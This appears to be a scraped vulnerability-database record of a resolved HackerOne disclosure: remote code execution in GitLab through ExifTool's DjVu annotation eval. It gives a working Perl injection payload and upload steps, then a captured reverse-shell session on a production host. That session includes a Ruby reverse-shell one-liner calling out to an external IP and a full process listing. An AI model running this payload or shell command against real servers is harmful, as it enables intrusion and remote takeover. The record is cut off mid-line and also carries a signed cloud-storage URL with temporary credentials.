Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T16:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T16:29:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T16:29:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ2FF4SYMO%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T162946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEH8aCXVzLXdlc3QtMiJHMEUCIQDDfqFhJEJq37%2BPB7Es7Nf7BBjQ6S1IrtQ0lpt8dmmPXgIgUNZpK4l5hnnx6XNM920KM900MMfZBgWwaQ9%2B12duXqcq%2BgMIGBACGgwwMTM2MTkyNzQ4NDkiDOJYnBzW6t%2FLdhyiRCrXAwxMndVK%2F1WIUsdbMXugfZ3x95S5foaVjQlZWJ7LOh%2BHMZPmUEgUmzPXv3vX%2BgHKsTpd%2Bik2ekOVuqUxuJh0JYJ0UZs%2Bl76LVJJV%2FQ8FSUX5PevM3%2B6pzjxyixbuW%2Bsb65oLaeMwElUZP8PmjLBV%2B%2BZu1JUGnu70hxdq2CToxwzgA6cyjHcfx32Op%2B4OyRAKJil27c4gwpQNJ9odBt0AsHsroa5z%2BQh8KPuEKuIKqIU8rgbFwBW6FybiiJYFA0Pgm4bIwbsjS%2FO44774uNFVH1BT25LwB%2FBECQxgwCov3nPZ0JawFd%2BKhRYE3We3RFaYdXFENJEp%2FwxP68kCSqolLFC0i%2BHnUV3mVI5jqr2fIZrM7Os%2FN%2FRnGS6SsgipMHK%2F2EeDqTLg6MN9zbcsqRY7PGJ3b5ZTQ9UoFI0S1UtTFcMO5rghCvsR9drVA8i1TrHTQHtGKHvGxYqg6AdybiecCAo%2B%2FW4KeLf1a3%2BBbmdjVshkPYWnfKDjs%2FVTg%2Bydd2twm5JgrEh62cSVyvEfSocbkiElDZcbCTwbUZ9zO6XMqDXnEFOzIlCETta9jJF8HVg8SFiN6gXf2HNwxeAk8J7QZ4veOAPnZC3%2FMjaS1N4MSU7cRajFFgzhoTDQxv%2BEBjqlAUMv65Xw%2BHok9awIgZ2cTI8C3ZPXeYwAu2pZrrMkJFa9OlTIuAFPO8kMsefJmeYix%2BBgI9Og7HEvEfaaLtwln3%2FKJzRMDB0BBSwvDqGNZ5x68SkH0w0cy4aAy0%2F%2FxCrLCmXvpZATvtU6HOZais8nGELmVbvJjRAfEdEIHv82y%2BGATXa8GOuLKs6AMQTFWCh6oPngdVbQART4wOe0Oj9f3pDrbobMUg%3D%3D&X-Amz-Signature=a2d1e786b025ea3a8a398dde8a1f50827f577b49f271d713a8ed6535932bb401"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T16:29:46", "differentElements": ["h1reporter"], "edition": 21}, {"bulletin": {"id": "H1:1154542", "hash": "f389fffb5ce328e7895b3250ee3a3924", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: 